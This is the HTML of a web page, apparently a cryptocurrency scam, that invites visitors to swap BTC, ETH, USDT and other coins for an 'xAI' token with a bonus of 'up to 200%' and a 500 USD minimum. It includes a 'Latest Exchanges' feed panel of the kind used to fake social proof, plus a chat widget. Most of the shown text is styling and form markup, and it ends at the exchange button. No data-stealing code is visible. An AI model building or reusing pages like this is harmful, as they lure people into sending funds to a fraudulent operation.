<html lang="en">
  <head>
<!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/68dbff5ee69f4b194f45a9b7/1j6dlr2i5';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->


    <meta charset="UTF-8">
    <title>Swap xAI</title>
    <link href="favicon.ico" rel="icon" type="image/x-icon">
    <link href="favicon.ico" rel="shortcut icon" type="image/x-icon">
    <meta content="width=device-width,initial-scale=1" name="viewport">

    <script src="particles.js/2.0.0/particles.min.js"></script> 
    
    <style>
      .fade-change {
        animation: fadeChange .3s ease-in-out
      }

      @keyframes fadeChange {
        from {
          opacity: .3;
          transform: scale(.98)
        }

        to {
          opacity: 1;
          transform: scale(1)
        }
      }

      input[type=number]::-webkit-inner-spin-button,
      input[type=number]::-webkit-outer-spin-button {
        -webkit-appearance: none;
        margin: 0
      }

      input[type=number] {
        -moz-appearance: textfield
      }

      @keyframes dropdownIn {
        0% {
          opacity: 0;
          transform: translateY(-5px) scale(.95)
        }

        100% {
          opacity: 1;
          transform: translateY(0) scale(1)
        }
      }

      @keyframes dropdownOut {
        0% {
          opacity: 1;
          transform: translateY(0) scale(1)
        }

        100% {
          opacity: 0;
          transform: translateY(-5px) scale(.95)
        }
      }

      .animate-dropdown-in {
        animation: dropdownIn .25s ease-out forwards
      }

      .animate-dropdown-out {
        animation: dropdownOut .2s ease-in forwards
      }

      body {
        margin: 0;
        padding: 0;
        overflow-x: hidden;
        display: flex;
        flex-direction: column;
        min-height: 100%
      }

      body,
      html {
        height: 100%;
        overflow: auto
      }

      #formSection {
        flex-grow: 1;
        overflow: visible
      }

      #paymentSection {
        max-height: 80vh;
        overflow-y: scroll;
        margin-top: 2rem
      }

      footer {
        margin-top: auto;
        padding-bottom: 1rem
      }

      ::-webkit-scrollbar {
        width: 0;
        height: 0
      }

      ::-webkit-scrollbar-track {
        background: 0 0
      }

      ::-webkit-scrollbar-thumb {
        background: 0 0
      }

      #dropdownMenu::-webkit-scrollbar {
        width: 6px
      }

      #dropdownMenu::-webkit-scrollbar-track {
        background: 0 0
      }

      #dropdownMenu::-webkit-scrollbar-thumb {
        background-color: #4b5563;
        border-radius: 3px
      }

      #dropdownMenu:hover::-webkit-scrollbar-thumb {
        background-color: #9ca3af
      }

      #dropdownMenu {
        scrollbar-width: thin;
        scrollbar-color: #4b5563 transparent
      }

      #paymentSection {
        position: sticky;
        bottom: 0;
        max-height: 100vh;
        overflow-y: auto;
        padding-bottom: 4rem
      }

      .importance-banner {
        position: sticky;
        bottom: 0;
        background: #10121a;
        border-top: 2px solid #f59e0b;
        padding: .75rem 1rem;
        text-align: center
      }

      @keyframes fadeSlideIn {
        from {
          opacity: 0;
          transform: translateY(8px)
        }

        to {
          opacity: 1;
          transform: translateY(0)
        }
      }

      .swap-entry {
        animation: fadeSlideIn .3s ease forwards
      }

      body {
        scrollbar-width: none;
        scrollbar-color: transparent transparent
      }
    </style>
    <style>
      *,
      ::before,
      ::after {
        --tw-border-spacing-x: 0;
        --tw-border-spacing-y: 0;
        --tw-translate-x: 0;
        --tw-translate-y: 0;
        --tw-rotate: 0;
        --tw-skew-x: 0;
        --tw-skew-y: 0;
        --tw-scale-x: 1;
        --tw-scale-y: 1;
        --tw-pan-x: ;
        --tw-pan-y: ;
        --tw-pinch-zoom: ;
        --tw-scroll-snap-strictness: proximity;
        --tw-gradient-from-position: ;
        --tw-gradient-via-position: ;
        --tw-gradient-to-position: ;
        --tw-ordinal: ;
        --tw-slashed-zero: ;
        --tw-numeric-figure: ;
        --tw-numeric-spacing: ;
        --tw-numeric-fraction: ;
        --tw-ring-inset: ;
        --tw-ring-offset-width: 0px;
        --tw-ring-offset-color: #fff;
        --tw-ring-color: rgb(59 130 246 / 0.5);
        --tw-ring-offset-shadow: 0 0 #0000;
        --tw-ring-shadow: 0 0 #0000;
        --tw-shadow: 0 0 #0000;
        --tw-shadow-colored: 0 0 #0000;
        --tw-blur: ;
        --tw-brightness: ;
        --tw-contrast: ;
        --tw-grayscale: ;
        --tw-hue-rotate: ;
        --tw-invert: ;
        --tw-saturate: ;
        --tw-sepia: ;
        --tw-drop-shadow: ;
        --tw-backdrop-blur: ;
        --tw-backdrop-brightness: ;
        --tw-backdrop-contrast: ;
        --tw-backdrop-grayscale: ;
        --tw-backdrop-hue-rotate: ;
        --tw-backdrop-invert: ;
        --tw-backdrop-opacity: ;
        --tw-backdrop-saturate: ;
        --tw-backdrop-sepia: ;
        --tw-contain-size: ;
        --tw-contain-layout: ;
        --tw-contain-paint: ;
        --tw-contain-style:
      }

      ::backdrop {
        --tw-border-spacing-x: 0;
        --tw-border-spacing-y: 0;
        --tw-translate-x: 0;
        --tw-translate-y: 0;
        --tw-rotate: 0;
        --tw-skew-x: 0;
        --tw-skew-y: 0;
        --tw-scale-x: 1;
        --tw-scale-y: 1;
        --tw-pan-x: ;
        --tw-pan-y: ;
        --tw-pinch-zoom: ;
        --tw-scroll-snap-strictness: proximity;
        --tw-gradient-from-position: ;
        --tw-gradient-via-position: ;
        --tw-gradient-to-position: ;
        --tw-ordinal: ;
        --tw-slashed-zero: ;
        --tw-numeric-figure: ;
        --tw-numeric-spacing: ;
        --tw-numeric-fraction: ;
        --tw-ring-inset: ;
        --tw-ring-offset-width: 0px;
        --tw-ring-offset-color: #fff;
        --tw-ring-color: rgb(59 130 246 / 0.5);
        --tw-ring-offset-shadow: 0 0 #0000;
        --tw-ring-shadow: 0 0 #0000;
        --tw-shadow: 0 0 #0000;
        --tw-shadow-colored: 0 0 #0000;
        --tw-blur: ;
        --tw-brightness: ;
        --tw-contrast: ;
        --tw-grayscale: ;
        --tw-hue-rotate: ;
        --tw-invert: ;
        --tw-saturate: ;
        --tw-sepia: ;
        --tw-drop-shadow: ;
        --tw-backdrop-blur: ;
        --tw-backdrop-brightness: ;
        --tw-backdrop-contrast: ;
        --tw-backdrop-grayscale: ;
        --tw-backdrop-hue-rotate: ;
        --tw-backdrop-invert: ;
        --tw-backdrop-opacity: ;
        --tw-backdrop-saturate: ;
        --tw-backdrop-sepia: ;
        --tw-contain-size: ;
        --tw-contain-layout: ;
        --tw-contain-paint: ;
        --tw-contain-style:
      }

      /* ! tailwindcss v3.4.17 | MIT License | https://tailwindcss.com */
      *,
      ::after,
      ::before {
        box-sizing: border-box;
        border-width: 0;
        border-style: solid;
        border-color: #e5e7eb
      }

      ::after,
      ::before {
        --tw-content: ''
      }

      :host,
      html {
        line-height: 1.5;
        -webkit-text-size-adjust: 100%;
        -moz-tab-size: 4;
        tab-size: 4;
        font-family: ui-sans-serif, system-ui, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
        font-feature-settings: normal;
        font-variation-settings: normal;
        -webkit-tap-highlight-color: transparent
      }

      body {
        margin: 0;
        line-height: inherit
      }

      hr {
        height: 0;
        color: inherit;
        border-top-width: 1px
      }

      abbr:where([title]) {
        -webkit-text-decoration: underline dotted;
        text-decoration: underline dotted
      }

      h1,
      h2,
      h3,
      h4,
      h5,
      h6 {
        font-size: inherit;
        font-weight: inherit
      }

      a {
        color: inherit;
        text-decoration: inherit
      }

      b,
      strong {
        font-weight: bolder
      }

      code,
      kbd,
      pre,
      samp {
        font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
        font-feature-settings: normal;
        font-variation-settings: normal;
        font-size: 1em
      }

      small {
        font-size: 80%
      }

      sub,
      sup {
        font-size: 75%;
        line-height: 0;
        position: relative;
        vertical-align: baseline
      }

      sub {
        bottom: -.25em
      }

      sup {
        top: -.5em
      }

      table {
        text-indent: 0;
        border-color: inherit;
        border-collapse: collapse
      }

      button,
      input,
      optgroup,
      select,
      textarea {
        font-family: inherit;
        font-feature-settings: inherit;
        font-variation-settings: inherit;
        font-size: 100%;
        font-weight: inherit;
        line-height: inherit;
        letter-spacing: inherit;
        color: inherit;
        margin: 0;
        padding: 0
      }

      button,
      select {
        text-transform: none
      }

      button,
      input:where([type=button]),
      input:where([type=reset]),
      input:where([type=submit]) {
        -webkit-appearance: button;
        background-color: transparent;
        background-image: none
      }

      :-moz-focusring {
        outline: auto
      }

      :-moz-ui-invalid {
        box-shadow: none
      }

      progress {
        vertical-align: baseline
      }

      ::-webkit-inner-spin-button,
      ::-webkit-outer-spin-button {
        height: auto
      }

      [type=search] {
        -webkit-appearance: textfield;
        outline-offset: -2px
      }

      ::-webkit-search-decoration {
        -webkit-appearance: none
      }

      ::-webkit-file-upload-button {
        -webkit-appearance: button;
        font: inherit
      }

      summary {
        display: list-item
      }

      blockquote,
      dd,
      dl,
      figure,
      h1,
      h2,
      h3,
      h4,
      h5,
      h6,
      hr,
      p,
      pre {
        margin: 0
      }

      fieldset {
        margin: 0;
        padding: 0
      }

      legend {
        padding: 0
      }

      menu,
      ol,
      ul {
        list-style: none;
        margin: 0;
        padding: 0
      }

      dialog {
        padding: 0
      }

      textarea {
        resize: vertical
      }

      input::placeholder,
      textarea::placeholder {
        opacity: 1;
        color: #9ca3af
      }

      [role=button],
      button {
        cursor: pointer
      }

      :disabled {
        cursor: default
      }

      audio,
      canvas,
      embed,
      iframe,
      img,
      object,
      svg,
      video {
        display: block;
        vertical-align: middle
      }

      img,
      video {
        max-width: 100%;
        height: auto
      }

      [hidden]:where(:not([hidden=until-found])) {
        display: none
      }

      .fixed {
        position: fixed
      }

      .absolute {
        position: absolute
      }

      .relative {
        position: relative
      }

      .inset-0 {
        inset: 0px
      }

      .bottom-10 {
        bottom: 2.5rem
      }

      .left-3 {
        left: 0.75rem
      }

      .left-4 {
        left: 1rem
      }

      .top-1\/2 {
        top: 50%
      }

      .bottom-6 {
        bottom: 1.5rem
      }

      .right-6 {
        right: 1.5rem
      }

      .bottom-20 {
        bottom: 5rem
      }

      .-z-10 {
        z-index: -10
      }

      .z-10 {
        z-index: 10
      }

      .z-20 {
        z-index: 20
      }

      .z-30 {
        z-index: 30
      }

      .z-40 {
        z-index: 40
      }

      .z-50 {
        z-index: 50
      }

      .mb-1 {
        margin-bottom: 0.25rem
      }

      .mb-2 {
        margin-bottom: 0.5rem
      }

      .mt-1 {
        margin-top: 0.25rem
      }

      .mt-2 {
        margin-top: 0.5rem
      }

      .mt-6 {
        margin-top: 1.5rem
      }

      .ml-5 {
        margin-left: 1.25rem
      }

      .block {
        display: block
      }

      .flex {
        display: flex
      }

      .hidden {
        display: none
      }

      .h-4 {
        height: 1rem
      }

      .h-44 {
        height: 11rem
      }

      .h-6 {
        height: 1.5rem
      }

      .h-8 {
        height: 2rem
      }

      .h-5 {
        height: 1.25rem
      }

      .h-\[500px\] {
        height: 500px
      }

      .max-h-60 {
        max-height: 15rem
      }

      .min-h-screen {
        min-height: 100vh
      }

      .w-4 {
        width: 1rem
      }

      .w-44 {
        width: 11rem
      }

      .w-6 {
        width: 1.5rem
      }

      .w-64 {
        width: 16rem
      }

      .w-8 {
        width: 2rem
      }

      .w-full {
        width: 100%
      }

      .w-5 {
        width: 1.25rem
      }

      .w-80 {
        width: 20rem
      }

      .max-w-3xl {
        max-width: 48rem
      }

      .max-w-\[80vw\] {
        max-width: 80vw
      }

      .max-w-xs {
        max-width: 20rem
      }

      .flex-1 {
        flex: 1 1 0%
      }

      .-translate-y-1\/2 {
        --tw-translate-y: -50%;
        transform: translate(var(--tw-translate-x), var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))
      }

      .scale-95 {
        --tw-scale-x: .95;
        --tw-scale-y: .95;
        transform: translate(var(--tw-translate-x), var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))
      }

      .transform {
        transform: translate(var(--tw-translate-x), var(--tw-translate-y)) rotate(var(--tw-rotate)) skewX(var(--tw-skew-x)) skewY(var(--tw-skew-y)) scaleX(var(--tw-scale-x)) scaleY(var(--tw-scale-y))
      }

      @keyframes spin {
        to {
          transform: rotate(360deg)
        }
      }

      .animate-spin {
        animation: spin 1s linear infinite
      }

      .cursor-pointer {
        cursor: pointer
      }

      .flex-col {
        flex-direction: column
      }

      .items-start {
        align-items: flex-start
      }

      .items-center {
        align-items: center
      }

      .justify-center {
        justify-content: center
      }

      .justify-between {
        justify-content: space-between
      }

      .gap-2 {
        gap: 0.5rem
      }

      .space-x-2> :not([hidden])~ :not([hidden]) {
        --tw-space-x-reverse: 0;
        margin-right: calc(0.5rem * var(--tw-space-x-reverse));
        margin-left: calc(0.5rem * calc(1 - var(--tw-space-x-reverse)))
      }

      .space-y-1> :not([hidden])~ :not([hidden]) {
        --tw-space-y-reverse: 0;
        margin-top: calc(0.25rem * calc(1 - var(--tw-space-y-reverse)));
        margin-bottom: calc(0.25rem * var(--tw-space-y-reverse))
      }

      .space-y-2> :not([hidden])~ :not([hidden]) {
        --tw-space-y-reverse: 0;
        margin-top: calc(0.5rem * calc(1 - var(--tw-space-y-reverse)));
        margin-bottom: calc(0.5rem * var(--tw-space-y-reverse))
      }

      .space-y-4> :not([hidden])~ :not([hidden]) {
        --tw-space-y-reverse: 0;
        margin-top: calc(1rem * calc(1 - var(--tw-space-y-reverse)));
        margin-bottom: calc(1rem * var(--tw-space-y-reverse))
      }

      .space-y-6> :not([hidden])~ :not([hidden]) {
        --tw-space-y-reverse: 0;
        margin-top: calc(1.5rem * calc(1 - var(--tw-space-y-reverse)));
        margin-bottom: calc(1.5rem * var(--tw-space-y-reverse))
      }

      .space-y-8> :not([hidden])~ :not([hidden]) {
        --tw-space-y-reverse: 0;
        margin-top: calc(2rem * calc(1 - var(--tw-space-y-reverse)));
        margin-bottom: calc(2rem * var(--tw-space-y-reverse))
      }

      .space-x-3> :not([hidden])~ :not([hidden]) {
        --tw-space-x-reverse: 0;
        margin-right: calc(0.75rem * var(--tw-space-x-reverse));
        margin-left: calc(0.75rem * calc(1 - var(--tw-space-x-reverse)))
      }

      .overflow-hidden {
        overflow: hidden
      }

      .overflow-y-auto {
        overflow-y: auto
      }

      .break-all {
        word-break: break-all
      }

      .rounded {
        border-radius: 0.25rem
      }

      .rounded-2xl {
        border-radius: 1rem
      }

      .rounded-lg {
        border-radius: 0.5rem
      }

      .rounded-xl {
        border-radius: 0.75rem
      }

      .rounded-full {
        border-radius: 9999px
      }

      .border {
        border-width: 1px
      }

      .border-2 {
        border-width: 2px
      }

      .border-b {
        border-bottom-width: 1px
      }

      .border-gray-600 {
        --tw-border-opacity: 1;
        border-color: rgb(75 85 99 / var(--tw-border-opacity, 1))
      }

      .border-gray-700 {
        --tw-border-opacity: 1;
        border-color: rgb(55 65 81 / var(--tw-border-opacity, 1))
      }

      .border-yellow-500 {
        --tw-border-opacity: 1;
        border-color: rgb(234 179 8 / var(--tw-border-opacity, 1))
      }

      .border-gray-300 {
        --tw-border-opacity: 1;
        border-color: rgb(209 213 219 / var(--tw-border-opacity, 1))
      }

      .bg-\[\#00ccff\] {
        --tw-bg-opacity: 1;
        background-color: rgb(0 204 255 / var(--tw-bg-opacity, 1))
      }

      .bg-\[\#0f1017\] {
        --tw-bg-opacity: 1;
        background-color: rgb(15 16 23 / var(--tw-bg-opacity, 1))
      }

      .bg-\[\#1a1c25\] {
        --tw-bg-opacity: 1;
        background-color: rgb(26 28 37 / var(--tw-bg-opacity, 1))
      }

      .bg-\[\#1f2937\] {
        --tw-bg-opacity: 1;
        background-color: rgb(31 41 55 / var(--tw-bg-opacity, 1))
      }

      .bg-gray-300 {
        --tw-bg-opacity: 1;
        background-color: rgb(209 213 219 / var(--tw-bg-opacity, 1))
      }

      .bg-gray-800 {
        --tw-bg-opacity: 1;
        background-color: rgb(31 41 55 / var(--tw-bg-opacity, 1))
      }

      .bg-white {
        --tw-bg-opacity: 1;
        background-color: rgb(255 255 255 / var(--tw-bg-opacity, 1))
      }

      .bg-\[\#10121a\] {
        --tw-bg-opacity: 1;
        background-color: rgb(16 18 26 / var(--tw-bg-opacity, 1))
      }

      .bg-blue-600 {
        --tw-bg-opacity: 1;
        background-color: rgb(37 99 235 / var(--tw-bg-opacity, 1))
      }

      .bg-gray-100 {
        --tw-bg-opacity: 1;
        background-color: rgb(243 244 246 / var(--tw-bg-opacity, 1))
      }

      .bg-gradient-to-r {
        background-image: linear-gradient(to right, var(--tw-gradient-stops))
      }

      .from-blue-600 {
        --tw-gradient-from: #2563eb var(--tw-gradient-from-position);
        --tw-gradient-to: rgb(37 99 235 / 0) var(--tw-gradient-to-position);
        --tw-gradient-stops: var(--tw-gradient-from), var(--tw-gradient-to)
      }

      .to-blue-500 {
        --tw-gradient-to: #3b82f6 var(--tw-gradient-to-position)
      }

      .p-1 {
        padding: 0.25rem
      }

      .p-12 {
        padding: 3rem
      }

      .p-6 {
        padding: 1.5rem
      }

      .p-4 {
        padding: 1rem
      }

      .p-2 {
        padding: 0.5rem
      }

      .px-3 {
        padding-left: 0.75rem;
        padding-right: 0.75rem
      }

      .px-4 {
        padding-left: 1rem;
        padding-right: 1rem
      }

      .px-6 {
        padding-left: 1.5rem;
        padding-right: 1.5rem
      }

      .py-1 {
        padding-top: 0.25rem;
        padding-bottom: 0.25rem
      }

      .py-2 {
        padding-top: 0.5rem;
        padding-bottom: 0.5rem
      }

      .py-3 {
        padding-top: 0.75rem;
        padding-bottom: 0.75rem
      }

      .pl-12 {
        padding-left: 3rem
      }

      .text-left {
        text-align: left
      }

      .text-center {
        text-align: center
      }

      .text-2xl {
        font-size: 1.5rem;
        line-height: 2rem
      }

      .text-3xl {
        font-size: 1.875rem;
        line-height: 2.25rem
      }

      .text-sm {
        font-size: 0.875rem;
        line-height: 1.25rem
      }

      .text-xs {
        font-size: 0.75rem;
        line-height: 1rem
      }

      .text-xl {
        font-size: 1.25rem;
        line-height: 1.75rem
      }

      .font-bold {
        font-weight: 700
      }

      .font-semibold {
        font-weight: 600
      }

      .leading-none {
        line-height: 1
      }

      .leading-snug {
        line-height: 1.375
      }

      .text-\[\#00ccff\] {
        --tw-text-opacity: 1;
        color: rgb(0 204 255 / var(--tw-text-opacity, 1))
      }

      .text-black {
        --tw-text-opacity: 1;
        color: rgb(0 0 0 / var(--tw-text-opacity, 1))
      }

      .text-blue-400 {
        --tw-text-opacity: 1;
        color: rgb(96 165 250 / var(--tw-text-opacity, 1))
      }

      .text-gray-300 {
        --tw-text-opacity: 1;
        color: rgb(209 213 219 / var(--tw-text-opacity, 1))
      }

      .text-gray-400 {
        --tw-text-opacity: 1;
        color: rgb(156 163 175 / var(--tw-text-opacity, 1))
      }

      .text-gray-500 {
        --tw-text-opacity: 1;
        color: rgb(107 114 128 / var(--tw-text-opacity, 1))
      }

      .text-green-400 {
        --tw-text-opacity: 1;
        color: rgb(74 222 128 / var(--tw-text-opacity, 1))
      }

      .text-red-500 {
        --tw-text-opacity: 1;
        color: rgb(239 68 68 / var(--tw-text-opacity, 1))
      }

      .text-white {
        --tw-text-opacity: 1;
        color: rgb(255 255 255 / var(--tw-text-opacity, 1))
      }

      .text-yellow-400 {
        --tw-text-opacity: 1;
        color: rgb(250 204 21 / var(--tw-text-opacity, 1))
      }

      .text-red-400 {
        --tw-text-opacity: 1;
        color: rgb(248 113 113 / var(--tw-text-opacity, 1))
      }

      .text-yellow-300 {
        --tw-text-opacity: 1;
        color: rgb(253 224 71 / var(--tw-text-opacity, 1))
      }

      .text-blue-600 {
        --tw-text-opacity: 1;
        color: rgb(37 99 235 / var(--tw-text-opacity, 1))
      }

      .text-green-300 {
        --tw-text-opacity: 1;
        color: rgb(134 239 172 / var(--tw-text-opacity, 1))
      }

      .placeholder-gray-500::placeholder {
        --tw-placeholder-opacity: 1;
        color: rgb(107 114 128 / var(--tw-placeholder-opacity, 1))
      }

      .opacity-25 {
        opacity: 0.25
      }

      .opacity-75 {
        opacity: 0.75
      }

      .opacity-0 {
        opacity: 0
      }

      .shadow-lg {
        --tw-shadow: 0 10px 15px -3px rgb(0 0 0 / 0.1), 0 4px 6px -4px rgb(0 0 0 / 0.1);
        --tw-shadow-colored: 0 10px 15px -3px var(--tw-shadow-color), 0 4px 6px -4px var(--tw-shadow-color);
        box-shadow: var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)
      }

      .shadow-xl {
        --tw-shadow: 0 20px 25px -5px rgb(0 0 0 / 0.1), 0 8px 10px -6px rgb(0 0 0 / 0.1);
        --tw-shadow-colored: 0 20px 25px -5px var(--tw-shadow-color), 0 8px 10px -6px var(--tw-shadow-color);
        box-shadow: var(--tw-ring-offset-shadow, 0 0 #0000), var(--tw-ring-shadow, 0 0 #0000), var(--tw-shadow)
      }

      .transition {
        transition-property: color, background-color, border-color, fill, stroke, opacity, box-shadow, transform, filter, -webkit-text-decoration-color, -webkit-backdrop-filter;
        transition-property: color, background-color, border-color, text-decoration-color, fill, stroke, opacity, box-shadow, transform, filter, backdrop-filter;
        transition-property: color, background-color, border-color, text-decoration-color, fill, stroke, opacity, box-shadow, transform, filter, backdrop-filter, -webkit-text-decoration-color, -webkit-backdrop-filter;
        transition-timing-function: cubic-bezier(0.4, 0, 0.2, 1);
        transition-duration: 150ms
      }

      .transition-all {
        transition-property: all;
        transition-timing-function: cubic-bezier(0.4, 0, 0.2, 1);
        transition-duration: 150ms
      }

      .duration-300 {
        transition-duration: 300ms
      }

      .last\:border-0:last-child {
        border-width: 0px
      }

      .hover\:bg-\[\#00aacc\]:hover {
        --tw-bg-opacity: 1;
        background-color: rgb(0 170 204 / var(--tw-bg-opacity, 1))
      }

      .hover\:bg-gray-700:hover {
        --tw-bg-opacity: 1;
        background-color: rgb(55 65 81 / var(--tw-bg-opacity, 1))
      }

      .hover\:bg-white:hover {
        --tw-bg-opacity: 1;
        background-color: rgb(255 255 255 / var(--tw-bg-opacity, 1))
      }

      .hover\:bg-blue-700:hover {
        --tw-bg-opacity: 1;
        background-color: rgb(29 78 216 / var(--tw-bg-opacity, 1))
      }

      .hover\:text-blue-800:hover {
        --tw-text-opacity: 1;
        color: rgb(30 64 175 / var(--tw-text-opacity, 1))
      }

      .focus\:outline-none:focus {
        outline: 2px solid transparent;
        outline-offset: 2px
      }
    </style>
    <style>
      .justify-end {
          justify-content: flex-end;
      }
      .bg-blue-500 {
          --tw-bg-opacity: 1;
          background-color: rgb(59 130 246 / var(--tw-bg-opacity, 1));
      }      
      .cursor-not-allowed {
          cursor: not-allowed;
      }      
      .opacity-50 {
          opacity: 0.5;
      }      
    </style>
    <style id="OTYwMDAwMDE5OTk5OTUx"></style>
    <script type="text/javascript" charset="utf-8" defer="" async="" src="chrome-extension://lnaahdmijnjnmgaalacdgakieangpjgp/inject-scripts/set-global.js" data-params="{&quot;name&quot;:&quot;__stopWatching&quot;,&quot;value&quot;:true}"></script>
    <script type="text/javascript" charset="utf-8" defer="" async="" src="chrome-extension://lnaahdmijnjnmgaalacdgakieangpjgp/inject-scripts/set-global.js" data-params="{&quot;name&quot;:&quot;__jsons&quot;,&quot;value&quot;:[]}"></script>
  </head>
  <body class="text-white px-4 bg-[#0f1017] min-h-screen overflow-hidden relative">
    <div class="absolute -z-10 inset-0" id="particles-bg">
      <canvas data-generated="true" style="width: 100% !important; height: 100% !important; position: fixed !important; z-index: 0 !important; top: 0px !important; left: 0px !important; pointer-events: none;" aria-hidden="true" width="1440" height="765"></canvas>
    </div>
    <div class="flex items-center justify-center min-h-screen">
      <div class="relative bg-[#1a1c25] rounded-2xl max-w-3xl p-12 shadow-xl space-y-8 w-full z-20">
        <div class="text-center">
          <h1 class="font-bold text-3xl text-[#00ccff]">SWAP xAI</h1>
          <p class="text-sm mt-2 text-gray-400">Exchange your crypto for xAI and grab a bonus of up to <span class="font-bold text-green-400">200%</span>. </p>
        </div>
        <div class="fixed bottom-10 left-4 z-40" id="recent-swaps-container">
          <button class="text-sm text-white bg-gray-800 hover:bg-gray-700 mb-2 px-3 py-1 rounded transition" onclick="toggleSwapsPanel()">Hide Swaps</button>
          <div class="text-sm space-y-2 bg-[#1f2937] duration-300 max-w-[80vw] px-4 py-3 rounded-xl shadow-lg text-white transition-all w-64" id="recent-swaps">
            <div class="mb-1 font-semibold text-blue-400">💸 Latest Exchanges</div>
            <ul class="space-y-1" id="swap-feed">
            </ul>
          </div>
        </div>
        <div class="space-y-4" id="formSection">
          <div class="relative">
            <label class="text-sm text-gray-300 block mb-1">Select a cryptocurrency.</label>
            <button class="flex items-center px-4 justify-between py-3 bg-[#0f1017] border border-gray-700 rounded-lg w-full" id="dropdownBtn">
              <div class="flex items-center space-x-2" id="selectedIconWrapper">
                <div class="flex items-center justify-center h-8 w-8">
                  <img class="hidden h-6 w-6" src="" id="selectedIcon">
                </div>
                <span class="text-white" id="selectedText">choose...</span>
              </div>
              <svg class="text-white h-4 w-4" fill="none" viewbox="0 0 24 24" stroke="currentColor">
                <path d="M19 9l-7 7-7-7" stroke-linecap="round" stroke-linejoin="round" stroke-width="2"></path>
              </svg>
            </button>
            <ul class="rounded-lg border border-gray-700 w-full absolute bg-gray-800 max-h-60 mt-1 overflow-y-auto transition-all z-10 animate-dropdown-out hidden" id="dropdownMenu">
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/1/large/bitcoin.png" class="w-6 h-6">
                  </div>
                  <span>BTC</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/279/large/ethereum.png" class="w-6 h-6">
                  </div>
                  <span>ETH</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/825/large/binance-coin-logo.png" class="w-6 h-6">
                  </div>
                  <span>BNB</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/325/large/Tether-logo.png" class="w-6 h-6">
                  </div>
                  <span>USDT</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/975/large/cardano.png" class="w-6 h-6">
                  </div>
                  <span>ADA</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 rounded-full bg-white flex items-center justify-center">
                    <img src="xrp.png" class="w-6 h-6">
                  </div>
                  <span>XRP</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/4128/large/solana.png" class="w-6 h-6">
                  </div>
                  <span>SOL</span>
                </div>
              </li>
              <li class="px-4 py-2 hover:bg-gray-700 flex items-center space-x-2 cursor-pointer border-b border-gray-700 last:border-0">
                <div class="flex items-center space-x-2">
                  <div class="w-8 h-8 flex items-center justify-center">
                    <img src="coins/images/1094/large/tron-logo.png" class="w-6 h-6">
                  </div>
                  <span>TRX</span>
                </div>
              </li>
            </ul>
          </div>
          <div>
            <label class="text-sm text-gray-300 block mb-1">Quantity</label>
            <input class="rounded-lg border border-gray-700 w-full bg-[#0f1017] px-4 py-3 text-left focus:outline-none" id="cryptoAmount" placeholder="0.0" type="number">
            <p class="text-sm mt-1 text-yellow-400" id="tierMessage"></p>
            <p class="text-sm mt-1 hidden text-red-500" id="minAmountMessage">Minimum required amount: 500 USD.</p>
          </div>
          <div class="hidden" id="networkWrapper">
            <label class="text-sm text-gray-300 block mb-1">USDT network</label>
            <select class="rounded-lg border border-gray-700 w-full bg-[#0f1017] px-4 py-3 text-left focus:outline-none text-gray-300" id="networkSelect">
              <option value="ethereum">Ethereum</option>
              <option value="tron">Tron</option>
              <option value="solana">Solana</option>
              <option value="bsc">Binance Smart Chain</option>
            </select>
          </div>
          <div>
            <label class="text-sm text-gray-300 block mb-1">You get xAI</label>
            <div class="relative">
              <input class="rounded-lg border border-gray-700 w-full bg-[#0f1017] px-4 py-3 text-left text-gray-300 fade-change pl-12" id="xaiOutput" placeholder="0.0" type="number" disabled="">
              <img class="absolute -translate-y-1/2 h-8 left-3 top-1/2 transform w-8" src="1.png" alt="xAI">
            </div>
          </div>
          <div>
            <label class="text-sm text-gray-300 block mb-1">Email <span class="text-gray-500 text-xs">(Optional)</span>
            </label>
            <input class="text-white px-4 py-3 bg-[#0f1017] border border-gray-700 focus:outline-none placeholder-gray-500 rounded-lg text-left w-full" id="email" placeholder="your@email.com" type="email">
          </div>
          <button class="rounded-lg w-full py-3 bg-gray-300 duration-300 font-semibold hover:bg-white text-black transition-all" id="swapButton">Exchange for xAI</button>
